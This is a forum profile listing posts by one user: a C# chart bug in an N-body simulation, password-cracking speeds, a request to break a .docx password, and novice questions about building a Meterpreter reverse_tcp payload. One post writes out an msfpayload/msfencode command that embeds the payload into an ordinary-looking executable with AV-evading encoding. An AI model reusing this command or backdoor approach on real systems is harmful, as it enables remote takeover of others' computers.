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Posts posted by daven

  1. when it comes to long char passwords it can take years.

    but this specific program that Mr-Protocol gave me uses also the GPU force.. that can raise the number of password per sec up to 27m and somewhere i saw 1 bill though i cant belive its possible.

    thats means that its possible to crack password with 7-8 words in 1-2 days :)

    so I belive its pretty hard to make this program with C++ nor python

  2. well hello guys i've been trying all day to find the password to a word file(.docx)

    the problem is that its encrypted with some wierd crypt that might be RSA but not for sure.

    i tried to use hex editor to find an key for the password or some text inside the document, with no succes.

    also i made the file as zip and open it with the 7zip to watch each file of the doc library, and all what was there was encrypted.

    if someone can help me to findout what a password for a locked .docx file (open password).

    ill be thankfull :)

    thank you for reading.


  3. hey guys, im doing a Numerical N Body Simulaiton on 2 dimensions

    that means that i can see the trip of stars like the Solar system.

    but the problem isnt the physic but the C#

    i used chart to show the points.

    when i draw the points its showing them in the wrong place .. if its (0,0) its show them at (123,12312312)

    and i cant understand what the problem...

    please i need help.

    i have to send the project in less then week...

    for (int j = 0; j < s.number_of_bodies(); j++)


    a = s.getx(j);// / 149597887000;

    b = s.gety(j);// / 149597887000;

    ch1.Series["Series" + (j + 3)].Points.AddXY(a, B);


    the parameters a,b are DOUBLE type and they get the right value although its drawn in the wrong place at the graph(chart).

    if its not wrong tell me and i'll upload the whole project so u can see this by urself.

    thanks for reading!

  4. OK, thanks for answering first of all I'm attacking my self i got 2 houses so I'm attacking my computer in the outside network.

    I just want to learn pen testing, security networking...

    and also learn how to protect my self against hackers by learning all these.

    i made the lhost to my external IP in the file.

    in the machine i set it as my inner IP address 192.168...

    about 1 - its VM and its bridged to the physical network.

    2 - yes the port waiting for the connection as u can see in the picture, in the background there is the page of my router's open ports.

    3 - its the same computer as mine and if i can attack mine ( there NO AV ) and if i can do it on my self in the network and its work so i guess it should work either on the "victim"(me). according to this the only thing i can do is to put the VM in the DMZ ;x?

  5. well, i created file using windows/meterpreter/reverse_tcp payload that his LHOST is my external ip address(whatismyip.com) and the port is 4444

    and on the machine i set the lhost to my inner ipv4 and the same port.

    i open this port, and although when i open the file in other network and no session are open.

    when i try the same with inner ip it works (when i try to backdoor my machine from the virtual machine).

    you can see all in this picture:



    tnx for reading hope u can help me guys :|

  6. hey guys, i'm new here in this thing so i might need some help

    I typed this command -

    msfpayload windows/meterpreter/reverse_tcp LHOST=MYIP LPORT=1337 R | msfencode -t exe -x Desktop/like.exe -k -o Desktop/newlike.exe -c x86/shikita_ga_nai -c 5

    however it wrote me x86/w.e failed: Not enough room for new section header...

    what i need to do about it?

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